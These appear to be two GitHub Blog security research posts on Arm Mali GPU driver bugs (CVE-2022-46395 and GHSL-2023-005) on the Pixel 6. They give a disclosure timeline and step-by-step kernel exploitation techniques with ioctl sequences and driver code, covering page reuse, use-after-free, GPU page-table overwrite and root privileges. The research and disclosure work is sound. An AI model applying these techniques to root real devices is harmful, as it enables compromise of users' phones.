The following figure illustrates these conditions and their relations to the race window.

One byte to root them all
Once the race is won, I can proceed to free and then replace the backing pages of the KBASE_MEM_TYPE_IMPORTED_USER_BUF region. Then, after the interrupt returns, KBASE_IOCTL_SOFT_EVENT_UPDATE will write new_status to the free’d (and now replaced) backing page of the KBASE_MEM_TYPE_IMPORTED_USER_BUF region via the kernel address created by vmap.

I’d like to replace those pages with memory pages used by the kernel. The problem here is that memory pages in the Linux kernel are allocated according to their zones and migrate type, and pages do not generally get allocated to a different zone or migrate type. In our case, the backing pages of the KBASE_MEM_TYPE_IMPORTED_USER_BUF come from a user space application, which are generally allocated with the GFP_HIGHUSER or the GFP_HIGHUSER_MOVABLE flag. On Android, which lacks the ZONE_HIGHMEM zone, this translates into an allocation in the ZONE_NORMAL with MIGRATE_UNMOVABLE (for GFP_HIGHUSER flag), or MIGRATE_MOVABLE (for GFP_HIGHUSER_MOVABLE flag) migrate type. Memory pages used by the kernel, such as those used by the SLUB allocator for allocating kernel objects, on the other hand, are allocated in the ZONE_NORMAL with MIGRATE_UNMOVABLE migration type. Many user space memory, such as those allocated via the mmap syscall, are allocated with the GFP_HIGHUSER_MOVABLE flag, making them unsuitable for my purpose. In order to replace the backing pages with kernel memory pages, I therefore need to find a way to map pages to user space that are allocated with the GFP_HIGHUSER flag.
The situation is similar to what I had with “The code that wasn’t there: Reading memory on an Android device by accident.” In the section “Leaking Kernel memory,” I used the asynchronous I/O file system to allocate user space memory with the GFP_HIGHUSER flag. By first allocating user space memory with the asynchronous I/O file system and then importing that memory to the Mali driver to create a KBASE_MEM_TYPE_IMPORTED_USER_BUF region with that memory as backing pages, I can create a KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region with backing pages in ZONE_NORMAL and the MIGRATE_UNMOVABLE migrate type, which can be reused as kernel pages.
One big problem with bugs in kbase_vmap_prot is that, in all uses of kbase_vmap_prot, there is very little control of the write value. In the case of the KBASE_IOCTL_SOFT_EVENT_UPDATE, it is only possible to write either zero or one to the chosen address:
static int kbasep_write_soft_event_status(
        struct kbase_context *kctx, u64 evt, unsigned char new_status)
{
    ...
    if ((new_status != BASE_JD_SOFT_EVENT_SET) &&
        (new_status != BASE_JD_SOFT_EVENT_RESET))
        return -EINVAL;
    mapped_evt = kbase_vmap_prot(kctx, evt, sizeof(*mapped_evt),
                     KBASE_REG_CPU_WR, &map);
    ...
    *mapped_evt = new_status;
    kbase_vunmap(kctx, &map);
    return 0;
}

In the above, new_status, which is the value to be written to the address evt, is checked to ensure that it is either BASE_JD_SOFT_EVENT_SET, or BASE_JD_SOFT_EVENT_RESET, which are one or zero, respectively.
Even though the write primitive is rather restrictive, by replacing the backing page of my KBASE_MEM_TYPE_IMPORTED_USER_BUF region with page table global directories (PGD) used by the kernel, or with pages used by the SLUB allocator, I still have a fairly strong primitive.
However, since the bug is rather difficult to trigger, ideally, I’d like to be able to replace the backing page reliably and finish the exploit by triggering the bug once only. This makes replacing the pages with kernel PGD or SLUB allocator backing pages less than ideal here, so let’s have a look at another option.
While most kernel objects are allocated via variants of the kmalloc call, which uses the SLUB allocator to allocate the object, large objects are sometimes allocated using variants of the vmalloc call. Unlike kmalloc, vmalloc allocates memory at the granularity of pages and it takes the page directly from the kernel page allocator. While vmalloc is inefficient for small locations, for allocations of objects larger than the size of a page, vmalloc is often considered a more optimal choice. It is also considered more secure as the allocated memory is used exclusively by the allocated object and a guard page is often inserted at the end of the memory. This means that any out-of-bounds access is likely to either hit unused memory or the guard page. In our case, however, replacing the backing page with a vmalloc object is just what I need. To optimize allocation, the kernel page allocator maintains a per CPU cache which it uses to keep track of pages that are recently freed on each CPU. New allocations from the same CPU are simply given the most recently freed page on that CPU from the per CPU cache. So by freeing the backing pages of a KBASE_MEM_TYPE_IMPORTED_USER_BUF region on a CPU, and then immediately allocating an object via vmalloc, the newly allocated object will reuse the backing pages of the KBASE_MEM_TYPE_IMPORTED_USER_BUF region. This allows me to write either zero or one to any offset in this object. A suitable object allocated by vzalloc (a variant of vmalloc that zeros out the allocated memory) is none but the kbase_mem_phy_alloc itself. The object is created by kbase_alloc_create, which can be triggered via many ioctl calls such as the KBASE_IOCTL_MEM_ALLOC:
static inline struct kbase_mem_phy_alloc *kbase_alloc_create(
        struct kbase_context *kctx, size_t nr_pages,
        enum kbase_memory_type type, int group_id)
{
    ...
    size_t alloc_size = sizeof(*alloc) + sizeof(*alloc->pages) * nr_pages;
    ...
    /* Allocate based on the size to reduce internal fragmentation of vmem */
    if (alloc_size > KBASE_MEM_PHY_ALLOC_LARGE_THRESHOLD)
        alloc = vzalloc(alloc_size);
    else
        alloc = kzalloc(alloc_size, GFP_KERNEL);
    ...
}

When creating a kbase_mem_phy_alloc object, the allocation size, alloc_size depends on the size of the region to be created. If alloc_size is larger than the KBASE_MEM_PHY_ALLOC_LARGE_THRESHOLD, then vzalloc is used for allocating the object. By making a KBASE_IOCTL_MEM_ALLOC ioctl call immediately after the KBASE_IOCTL_STICKY_RESOURCE_UNMAP ioctl call that frees the backing pages of a KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region, I can reliably replace the backing page with a kernel page that holds a kbase_mem_phy_alloc object:

ioctl(mali_fd, KBASE_IOCTL_STICKY_RESOURCE_UNMAP, ...);  //<------ frees backing page
ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, ...);              //<------ reclaim backing page as kbase_mem_phy_alloc

So, what should I rewrite in this object? There are many options, for example, rewriting the kref field can easily cause a refcounting problem and turn this into a UAF of a kbase_mem_phy_alloc, which is easy to exploit. It is, however, much simpler to just set the gpu_mappings field to zero:
struct kbase_mem_phy_alloc {
    struct kref           kref;
    atomic_t              gpu_mappings;
    atomic_t              kernel_mappings;
    size_t                nents;
    struct tagged_addr    *pages;
    ...
}

The Mali driver allows memory regions to share the same backing pages via the KBASE_IOCTL_MEM_ALIAS ioctl call. A memory region created by KBASE_IOCTL_MEM_ALLOC can be aliased by passing it as a parameter in the call to KBASE_IOCTL_MEM_ALIAS:

  union kbase_ioctl_mem_alloc alloc = ...;
  ...
  ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, &alloc);
  void* region = mmap(NULL, ..., mali_fd, alloc.out.gpu_va);
  union kbase_ioctl_mem_alias alias = ...;
  ...
  struct base_mem_aliasing_info ai = ...;
  ai.handle.basep.handle = (uint64_t)region;
  ...
  alias.in.aliasing_info = (uint64_t)(&ai);
  ioctl(mali_fd, KBASE_IOCTL_MEM_ALIAS, &alias);
  void* alias_region = mmap(NULL, ..., mali_fd,  alias.out.gpu_va);

In the above, a memory region is created using KBASE_IOCTL_MEM_ALLOC, and mapped to region. This region is then passed to the KBASE_IOCTL_MEM_ALIAS call. After mapping the result to user space, both region and alias_region share the same backing pages. As both regions now share the same backing pages, region must be prevented from resizing via the KBASE_IOCTL_MEM_COMMIT ioctl, otherwise the backing pages may be freed while it is still mapped to the alias_region:

  union kbase_ioctl_mem_alloc alloc = ...;
  ...
  ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, &alloc);
  void* region = mmap(NULL, ..., mali_fd, alloc.out.gpu_va);
  union kbase_ioctl_mem_alias alias = ...;
  ...
  struct base_mem_aliasing_info ai = ...;
  ai.handle.basep.handle = (uint64_t)region;
  ...
  alias.in.aliasing_info = (uint64_t)(&ai);
  ioctl(mali_fd, KBASE_IOCTL_MEM_ALIAS, &alias);
  void* alias_region = mmap(NULL, ..., mali_fd,  alias.out.gpu_va);

  struct kbase_ioctl_mem_commit commit = ...;
  commit.gpu_addr = (uint64_t)region;
  ioctl(mali_fd, KBASE_IOCTL_MEM_COMMIT, &commit);  //<---- ioctl fail as region cannot be resized

This is achieved using the gpu_mappings field in the gpu_alloc of a kbase_va_region. The gpu_mappings field keeps track of the number of memory regions that are sharing the same backing pages. When a region is aliased, gpu_mappings is incremented:
u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride,
            u64 nents, struct base_mem_aliasing_info *ai,
            u64 *num_pages)
{
    ...
    for (i = 0; i < nents; i++) {
        if (ai[i].handle.basep.handle > PAGE_SHIFT) 

The gpu_mappings is checked in the KBASE_IOCTL_MEM_COMMIT call to ensure that the region is not mapped multiple times:
int kbase_mem_commit(struct kbase_context *kctx, u64 gpu_addr, u64 new_pages)
{
    ...
    if (atomic_read(®->gpu_alloc->gpu_mappings) > 1)
        goto out_unlock;
    ...
}

So, by overwriting gpu_mappings of a memory region to zero, I can cause an aliased memory region to pass the above check and have its backing store resized. This then causes its backing pages to be removed without removing the alias mappings. In particular, after shrinking the backing store, the alias region can be used to access backing pages that are already freed.
The situation is now very similar to what I had in “Corrupting memory without memory corruption” and I can apply the technique from the section, “Breaking out of the context,” to this bug.
To recap, I now have a kbase_va_region whose backing pages are already freed and I’d like to reuse these freed backing pages so I can gain read and write access to arbitrary memory. To understand how this can be done, we need to know how backing pages to a kbase_va_region are allocated.
When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used:
int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages,
        struct tagged_addr *pages, bool partial_allowed)
{
    ...
    /* Get pages from this pool */
    while (nr_from_pool--) {
        p = kbase_mem_pool_remove_locked(pool);     //next_pool) {
        /* Allocate via next pool */
        err = kbase_mem_pool_alloc_pages(pool->next_pool,      //<----- 2.
                nr_4k_pages - i, pages + i, partial_allowed);
        ...
    } else {
        /* Get any remaining pages from kernel */
        while (i != nr_4k_pages) {
            p = kbase_mem_alloc_page(pool);     //<------- 3.
            ...
        }
        ...
    }
    ...
}

The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First the pages will be allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool is used to allocate the pages (2 in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel).

When freeing a page, the same happens: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context, if the memory pool is full, it’ll try to return the remaining pages to pool->next_pool. If the next pool is also full, then the remaining pages are returned to the kernel by freeing them via the buddy allocator.

As noted in “Corrupting memory without memory corruption,” pool->next_pool is a memory pool managed by the Mali driver and shared by all the kbase_context. It is also used for allocating page table global directories (PGD) used by GPU contexts. In particular, this means that by carefully arranging the memory pools, it is possible to cause a freed backing page in a kbase_va_region to be reused as a PGD of a GPU context. (The details of how to achieve this can be found in the section, “Breaking out of the context.”) As the bottom level PGD stores the physical addresses of the backing pages to GPU virtual memory addresses, being able to write to a PGD allows me to map arbitrary physical pages to the GPU memory, which I can then read from and write to by issuing GPU commands. This gives me access to arbitrary physical memory. As physical addresses for kernel code and static data are not randomized and depend only on the kernel image, I can use this primitive to overwrite arbitrary kernel code and gain arbitrary kernel code execution.

The exploit for Pixel 6 can be found here with some setup notes.
Conclusions
In this post I’ve shown how root cause analysis of CVE-2022-36449 revealed the unusual memory management in KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region, which then led to the discovery of another vulnerability. This shows how important it is to carry out root cause analysis of existing vulnerabilities and to use the knowledge to identify new variants of an issue. While CVE-2022-46395 seems very difficult to exploit due to a very tight race window and the limited write primitive that can be achieved by the bug, I’ve demonstrated how techniques from Racing against the clock—hitting a tiny kernel race window can be used to exploit seemingly impossible race conditions, and how UAF in memory pages can be exploited reliably even with a very limited write primitive.
The post Rooting with root cause: finding a variant of a Project Zero bug appeared first on The GitHub Blog.



Pwning Pixel 6 with a leftover patch
Man Yue Mo — Thu, 06 Apr 2023 16:00:48 +0000
The Christmas leftover patch
In the year 2023 A.D., after a long struggle, N-day vulnerabilities, such as CVE-2022-33917, CVE-2022-36449, and CVE-2022-38181 had been fixed in the Pixel 6. Vendor drivers like the Arm Mali had laid their patches at Android’s feet. Peace reigns, disturbed only by occasional toddlers bankrupting their parents with food ordering apps. All patches from upstream are applied.¹
All? No, one patch still stubbornly holds out.
@@ -2262,10 +2258,13 @@ int kbase_mem_commit(struct kbase_context *kctx, u64 gpu_addr, u64 new_pages)

        if (atomic_read(®->cpu_alloc->kernel_mappings) > 0)
                goto out_unlock;
        if (reg->flags & KBASE_REG_DONT_NEED)
                goto out_unlock;

+       if (reg->flags & KBASE_REG_NO_USER_FREE)
+               goto out_unlock;

In this post, I’m going to take a very close look at what these two lines, or rather, the lack of them, are capable of.
GHSL-2023-005
GHSL-2023-005 can be used to gain arbitrary kernel code execution and root privileges from a malicious app on the Pixel 6. What makes this bug interesting from a patching point of view is that it was already fixed publicly in the Arm Mali GPU driver on October 7, 2022 in the r40p0 release. While other security patches from the r40 version of the driver had been backported to the Pixel 6 in the January security update, the particular change mentioned in the previous section was missing.
I noticed this change shortly after r40p0 was released and had always assumed that it was a defense in depth measure against potential issues similar to CVE-2022-38181. As it was part of the changes made in the r40 version of the driver, I assumed it’d be applied to Android when other security patches from the r40 driver were applied. To my surprise, when I checked the January patch for Google’s Pixel phones, I realized that while many security patches from r40p0 had been applied, this particular change was missing. As it wasn’t clear to me whether this patch was going to be treated as a security issue and be applied at all, I reported it to the Android security team on January 10, 2023, together with a proof-of-concept exploit that roots the Pixel 6 phone to demonstrate the severity of the issue. I also sent a copy of the report to Arm in case it was an issue of cherry picking patches. Arm replied on January 31, 2023 saying that there might have been a problem with backporting patches to version r36p0. The Android security team rated the issue as a high-severity vulnerability on January 13, 2023. However, on February 14, 2023, the Android security team decided that the issue was a duplicate of an internally reported issue. The issue was eventually fixed silently in the March feature drop update (which was delayed until March 20, 2023 for Pixel 6), where the source code progressed to the Android 13 qpr2 branch. Looking at this branch, the fix uses the kbase_va_region_is_no_user_free function, which was introduced in upstream drivers from versions r41 onwards.
@@ -2270,8 +2237,11 @@

    if (atomic_read(®->cpu_alloc->kernel_mappings) > 0)
        goto out_unlock;
-   /* can't grow regions which are ephemeral */
-   if (reg->flags & KBASE_REG_DONT_NEED)
+
+   if (kbase_is_region_shrinkable(reg))
+       goto out_unlock;
+
+   if (kbase_va_region_is_no_user_free(kctx, reg))
        goto out_unlock;

So, it seems that this was indeed a backporting issue as Arm suggested, and the problem has only been fixed in the Pixel phones because the Android13 qpr2 branch uses a newer version of the driver. It is perhaps a piece of luck that the feature drop update is happening only two months after I reported the issue; otherwise, it may have taken longer to fix it.
The Arm Mali GPU
The Arm Mali GPU can be integrated in various devices (for example, see “Implementations” in the Mali (GPU) Wikipedia entry) ranging from Android phones to smart TV boxes. It has been an attractive target on Android phones and has been targeted by in-the-wild exploits multiple times.
This current issue is related to CVE-2022-38181, a vulnerability that I reported last year that is another vulnerability in the handling of a type of GPU memory, the JIT memory, in the Arm Mali driver. Readers may find the section “The life cycle of JIT memory” in that post useful, although for completeness, I’ll also briefly explain JIT memory and the root cause of CVE-2022-38181 in this post.
JIT memory in Arm Mali
When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This involves the user app opening the driver file and using the resulting file descriptor to make a series of ioctl calls. A kbase_context object is responsible for managing resources for each driver file that is opened and is unique for each file handle.
In particular, the kbase_context manages different types of memory that are shared between the GPU devices and user space applications. The JIT memory is one such type of memory whose lifetime is managed by the kernel driver. A user application can use the KBASE_IOCTL_JOB_SUBMIT ioctl call to instruct the GPU driver to create or free such memories. By submitting the BASE_JD_REQ_SOFT_JIT_ALLOC job, a user can allocate JIT memory, while the BASE_JD_REQ_SOFT_JIT_FREE job instructs the kernel to free the memory.
When users submit the BASE_JD_REQ_SOFT_JIT_FREE job to the GPU, the JIT memory region does not get freed immediately. Instead, the memory region is first shrunk to a minimal size via the function kbase_jit_free:
void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    //First reduce the size of the backing region and unmap the freed pages
    old_pages = kbase_reg_current_backed_size(reg);
    if (reg->initial_commit < old_pages) {
        u64 new_size = MAX(reg->initial_commit,
            div_u64(old_pages * (100 - kctx->trim_level), 100));
        u64 delta = old_pages - new_size;
        //Free delta pages in the region and reduces its size to old_pages - delta
        if (delta) {
            mutex_lock(&kctx->reg_lock);
            kbase_mem_shrink(kctx, reg, old_pages - delta);
            mutex_unlock(&kctx->reg_lock);
        }
    }
    ...

In the above, the kbase_va_region reg is a struct representing the JIT memory region, and kbase_mem_shrink is a function that shrinks the region while freeing some of its backing pages. As explained in my previous post, the kbase_jit_free function also moves the JIT region to the evict_list of the kbase_context.
void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    mutex_lock(&kctx->jit_evict_lock);
    /* This allocation can't already be on a list. */
    WARN_ON(!list_empty(®->gpu_alloc->evict_node));
    //Add reg to evict_list
    list_add(®->gpu_alloc->evict_node, &kctx->evict_list);
    atomic_add(reg->gpu_alloc->nents, &kctx->evict_nents);
    //Move reg to jit_pool_head
    list_move(®->jit_node, &kctx->jit_pool_head);
    ...
}

Memory regions in the evict_list will eventually be freed when memory pressure arises and the Linux kernel’s shrinker is triggered to reclaim unused memory. kbase_jit_free also performs other clean up actions that remove references to the JIT memory region so that it cannot no longer be reached from user space.
While the BASE_JD_SOFT_JIT_FREE GPU job can be used to put JIT memory in the evict_list so that it can be freed when the shrinker is triggered, the Arm Mali GPU driver also provides other ways to place a memory region in the evict_list. The KBASE_IOCTL_MEM_FLAGS_CHANGE ioctl can be used to call the kbase_mem_flags_change function with the BASE_MEM_DONT_NEED flag to place a memory region in the evict_list:
int kbase_mem_flags_change(struct kbase_context *kctx, u64 gpu_addr, unsigned int flags, unsigned int mask)
{
    ...
    prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED;
    new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED;
    if (prev_needed != new_needed) {
        ...
        if (new_needed) {
            ...
            ret = kbase_mem_evictable_make(reg->gpu_alloc);  //<------ Add to `evict_list`
            if (ret)
                goto out_unlock;
        } else {
            kbase_mem_evictable_unmake(reg->gpu_alloc);     //<------- Remove from `evict_list`
        }
    }

Prior to version r40p0 of the driver, this ioctl could be used to add a JIT region directly to the evict_list, bypassing the clean up actions done by kbase_jit_free. This then caused a use-after-free vulnerability, CVE-2022-38181, which was fixed in r40p0 by preventing such flag changes from being applied to JIT region:
@@ -951,6 +951,15 @@
    if (kbase_is_region_invalid_or_free(reg))
        goto out_unlock;

+   /* There is no use case to support MEM_FLAGS_CHANGE ioctl for allocations
+    * that have NO_USER_FREE flag set, to mark them as evictable/reclaimable.
+    * This would usually include JIT allocations, Tiler heap related allocations
+    * & GPU queue ringbuffer and none of them needs to be explicitly marked
+    * as evictable by Userspace.
+    */
+   if (reg->flags & KBASE_REG_NO_USER_FREE)
+       goto out_unlock;
+
    /* Is the region being transitioning between not needed and needed? */
    prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED;
    new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED;

In the above, code is added to prevent kbase_va_region with the KBASE_REG_NO_USER_FREE flag from being added to the evict_list via the kbase_mem_flags_change function. The KBASE_REG_NO_USER_FREE flag is added to the JIT region when it is created and is only removed while the region is being released. So, adding this condition very much prevents a JIT memory region from being added to the evict_list outside of kbase_jit_free.
For memory regions, however, memory management is not just about the lifetime of the kbase_va_region itself, but the backing pages of the kbase_va_region may also be released by using the KBASE_IOCTL_MEM_COMMIT ioctl. This ioctl allows the user to change the number of backing pages in a region and may also be used with JIT region to release its backing pages. So, naturally, the same condition should also be applied to the kbase_mem_commit function to avoid JIT regions being manipulated outside of the BASE_JD_SOFT_JIT_FREE job. This was indeed done by Arm to harden the handling of JIT memory:
@@ -2262,10 +2258,13 @@ int kbase_mem_commit(struct kbase_context *kctx, u64 gpu_addr, u64 new_pages)

        if (atomic_read(®->cpu_alloc->kernel_mappings) > 0)
                goto out_unlock;
        if (reg->flags & KBASE_REG_DONT_NEED)
                goto out_unlock;

+       if (reg->flags & KBASE_REG_NO_USER_FREE)
+               goto out_unlock;

This is the patch that we’re going to look at.
From defense-in-depth to offense-in-depth
While the changes made in the kbase_mem_commit function have removed the opportunity to manipulate the backing pages of a JIT region via the KBASE_IOCTL_MEM_COMMIT ioctl, the actual effect of the patch is more subtle, because even without the patch, the kbase_mem_commit function already prevents memory regions with the KBASE_REG_ACTIVE_JIT_ALLOC and KBASE_REG_DONT_NEED from being modified:
int kbase_mem_commit(struct kbase_context *kctx, u64 gpu_addr, u64 new_pages)
{
    ...
    if (reg->flags & KBASE_REG_ACTIVE_JIT_ALLOC)
        goto out_unlock;
    ...
    /* can't grow regions which are ephemeral */
    if (reg->flags & KBASE_REG_DONT_NEED)
        goto out_unlock;

The KBASE_REG_ACTIVE_JIT_ALLOC flag indicates that a JIT region is actively being used, and it is added when the JIT region is allocated:
struct kbase_va_region *kbase_jit_allocate(struct kbase_context *kctx,
        const struct base_jit_alloc_info *info,
        bool ignore_pressure_limit)
{
    ...
    if (info->usage_id != 0)
        /* First scan for an allocation with the same usage ID */
        reg = find_reasonable_region(info, &kctx->jit_pool_head, false);
    if (!reg)
        /* No allocation with the same usage ID, or usage IDs not in
         * use. Search for an allocation we can reuse.
         */
        reg = find_reasonable_region(info, &kctx->jit_pool_head, true);
    ...
    } else {
        ...
        reg = kbase_mem_alloc(kctx, info->va_pages, info->commit_pages, info->extension,
                      &flags, &gpu_addr, mmu_sync_info);
        ...
    }
    ...
    reg->flags |= KBASE_REG_ACTIVE_JIT_ALLOC;
    ...
    return reg;
}

It is removed when kbase_jit_free is called on the region:
void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    kbase_gpu_vm_lock(kctx);
    reg->flags |= KBASE_REG_DONT_NEED;
    reg->flags &= ~KBASE_REG_ACTIVE_JIT_ALLOC;
    ...
    kbase_gpu_vm_unlock(kctx);
    ...
}

However, at this point, the KBASE_REG_DONT_NEED is added to the JIT region. It seems that during the lifetime of a JIT region, either the KBASE_REG_ACTIVE_JIT_ALLOC or the KBASE_REG_DONT_NEED flag is added to the region and so the use of JIT region in kbase_mem_commit is already covered entirely?
Well, not entirely—one small window still holds out against these flags. And lifetime management is not easy for JIT regions in the fortified camps of Midgard, Bifrost, and Valhal.
As explained in the section “The life cycle of JIT memory” of my previous post, after a JIT region is freed by submitting the BASE_JD_REQ_SOFT_JIT_FREE GPU job, it’s added to the jit_pool_head list. JIT regions that are in the jit_pool_head list are not yet destroyed and can be reused as JIT regions if another BASE_JD_REQ_SOFT_JIT_ALLOC job is submitted. When kbase_jit_allocate is called to allocate JIT region, it’ll first look in the jit_pool_head for an unused region:
struct kbase_va_region *kbase_jit_allocate(struct kbase_context *kctx,
        const struct base_jit_alloc_info *info,
        bool ignore_pressure_limit)
{
    ...
    if (info->usage_id != 0)
        /* First scan for an allocation with the same usage ID */
        reg = find_reasonable_region(info, &kctx->jit_pool_head, false);
    ...
    if (reg) {
        ...
        ret = kbase_jit_grow(kctx, info, reg, prealloc_sas,
                     mmu_sync_info);
        ...
    }
    ...
}

If a region is found in the jit_pool_head, kbase_jit_grow is called on the region to change its backing store to a suitable size. At this point, the region reg still has the KBASE_REG_DONT_NEED flag attached and is still on the evict_list. However, kbase_jit_grow will first remove reg from the evict_list and remove the KBASE_REG_DONT_NEED flag by calling kbase_mem_evictable_unmake:
static int kbase_jit_grow(struct kbase_context *kctx,
              const struct base_jit_alloc_info *info,
              struct kbase_va_region *reg,
              struct kbase_sub_alloc **prealloc_sas,
              enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
    /* Make the physical backing no longer reclaimable */
    if (!kbase_mem_evictable_unmake(reg->gpu_alloc))      //<---- removes KBASE_REG_DONT_NEED
        goto update_failed;
    ...

After this point, the region has neither the KBASE_REG_DONT_NEED nor the KBASE_REG_ACTIVE_JIT_ALLOC flag. It is still protected by the kctx->reg_lock, which prevents the kbase_mem_commit function from changing it. If the region needs to grow, it’ll try to take pages from a memory pool managed by the kbase_context kctx, and if the memory pool does not have the capacity, then it’ll try to grow the memory pool, during which the kctx->reg_lock is dropped:
static int kbase_jit_grow(struct kbase_context *kctx,
              const struct base_jit_alloc_info *info,
              struct kbase_va_region *reg,
              struct kbase_sub_alloc **prealloc_sas,
              enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
    while (kbase_mem_pool_size(pool) < pages_required) {
      int pool_delta = pages_required - kbase_mem_pool_size(pool);
      int ret;
      kbase_mem_pool_unlock(pool);
      spin_unlock(&kctx->mem_partials_lock);
      kbase_gpu_vm_unlock(kctx);                   
      ret = kbase_mem_pool_grow(pool, pool_delta);  //<------- race window 
      kbase_gpu_vm_lock(kctx);
      ...
   }
}

Between the kbase_gpu_vm_unlock and kbase_gpu_vm_lock (marked as race window in the above), it is possible for kbase_mem_commit to modify the backing pages of reg. As kbase_mem_pool_grow involves rather large memory allocations from the kernel page allocator, this race window can be hit fairly easily.
The next question is, what can I do with this race?
To answer this, we need to take a look at how backing pages are stored in a kbase_va_region and what is involved in changing the size of the backing stores. The structure responsible for managing backing stores in a kbase_va_region is the kbase_mem_phy_alloc, stored as the gpu_alloc and cpu_alloc fields. In our settings, these two are the same. Within the kbase_mem_phy_alloc, the fields nents and pages are responsible for keeping track of the backing pages:
struct kbase_mem_phy_alloc {
    ...
    size_t                nents;
    struct tagged_addr    *pages;
    ...
}

The field nents is the number of backing pages for the region, while pages is an array containing addresses of the actual backing pages. When the size of the backing store changes, entries are either added to or removed from pages. When an entry is removed from pages, a NULL address is written to the entry. The size nents is also changed to reflect the new size of the backing store.
In general, growing the backing store involves the following:

Allocate memory pages and then add them to the pages array of the gpu_alloc, and then change gpu_alloc->nents to reflect the new size.
Insert the addresses of the new pages into the GPU page table to create GPU mappings so the pages can be accessed via the GPU. Shrinking the backing store is similar, but pages and mappings are removed instead of added.

We can now go back to take a look at the kbase_jit_grow function. Prior to growing the memory pool, it stores the number of pages that reg needs to grow by as delta, and the original size of reg as old_size.
static int kbase_jit_grow(struct kbase_context *kctx,
              const struct base_jit_alloc_info *info,
              struct kbase_va_region *reg,
              struct kbase_sub_alloc **prealloc_sas)
{
    ...
    /* Grow the backing */
    old_size = reg->gpu_alloc->nents;

    /* Allocate some more pages */
    delta = info->commit_pages - reg->gpu_alloc->nents;
    ...
    //grow memory pool
    ...

Recall that, while growing the memory pool, it is possible for another thread to modify the backing store of reg, which will change reg->gpu_alloc->nents and invalidates both old_size and delta. After growing the memory pool, both old_size and delta are used for allocating backing pages and creating GPU mappings:
static int kbase_jit_grow(struct kbase_context *kctx,
              const struct base_jit_alloc_info *info,
              struct kbase_va_region *reg,
              struct kbase_sub_alloc **prealloc_sas)
{
    ...
    //grow memory pool
    ...
    //delta use for allocating pages
    gpu_pages = kbase_alloc_phy_pages_helper_locked(reg->gpu_alloc, pool,
            delta, &prealloc_sas[0]);
    ...
    //old_size used for growing gpu mapping
    ret = kbase_mem_grow_gpu_mapping(kctx, reg, info->commit_pages,
            old_size);

The function kbase_alloc_phy_pages_helper_locked allocates delta number of pages and appends them to the reg->gpu_alloc->pages array. In order words, delta pages are added to the entries between reg->gpu_alloc->pages + nents and reg->gpu_alloc->pages + nents + delta:

The function kbase_mem_grow_gpu_mapping, on the other hand, maps the pages between reg->gpu_alloc->pages + old_size and reg->gpu_alloc->pages + info->commit_pages to the gpu addresses between region_start_address + old_size * 0x1000 and region_start_address + info->commit_pages * 0x1000, where region_start_address is the GPU address at the start of the region:

Now, what if reg->gpu_alloc->nents changed after old_size and delta are stored? For example, if I shrink the backing store of reg so that the new nents is smaller than old_size, then kbase_alloc_phy_pages_helper_locked will add delta pages to reg->gpu_alloc->pages, starting from reg->gpu_alloc->pages + nents:

After that, kbase_mem_grow_gpu_mapping will insert GPU mappings between region_start_address + old_size * 0x1000 and region_start_address + info->commit_pages * 0x1000, and back them with pages between reg->gpu_alloc->pages + old_size and reg->gpu_alloc->pages + info->commit_pages, independent of what nents is:

This creates gaps in reg->gpu_alloc->pages where the backing pages are not mapped to the GPU (indicated by No mapping in the figure) and gaps where addresses are mapped to the GPU but there are no backing pages (indicated as No backing in the above). Either way, it’s not obvious how to exploit such a situation. In the “No mapping” case, the addresses are invalid and accessing those addresses from the GPU simply results in a fault. In the latter case, the addresses are valid but the backing memory has zero as their physical address. Accessing these addresses from the GPU is most likely going to result in a crash.
A curious optimization
While auditing the Arm Mali driver code, I’ve noticed an interesting optimization in the kbase_mmu_teardown_pages function. This function is called to remove GPU mappings before releasing their backing pages. It is used every time a memory region is released or when its backing store shrinks.
This function essentially walks through a GPU address range and marks their page table entries as invalid, so the address can no longer be accessed from the GPU. What is curious about it is that, if it encounters a high level page table entry that is already marked as invalid, then it’ll skip a number of GPU addresses that belong to this entry:
int kbase_mmu_teardown_pages(struct kbase_device *kbdev,
    struct kbase_mmu_table *mmut, u64 vpfn, size_t nr, int as_nr)
{
        ...
        for (level = MIDGARD_MMU_TOPLEVEL;
                level <= MIDGARD_MMU_BOTTOMLEVEL; level++) {
            ...
            if (mmu_mode->ate_is_valid(page[index], level))
                break; /* keep the mapping */
            else if (!mmu_mode->pte_is_valid(page[index], level)) {
                /* nothing here, advance */
                switch (level) {
                ...
                case MIDGARD_MMU_LEVEL(2):
                    count = 512;            //<------ 1.
                    break;
                ...
                }
                if (count > nr)
                    count = nr;
                goto next;
            }
        ...
next:
        kunmap(phys_to_page(pgd));
        vpfn += count;
        nr -= count;

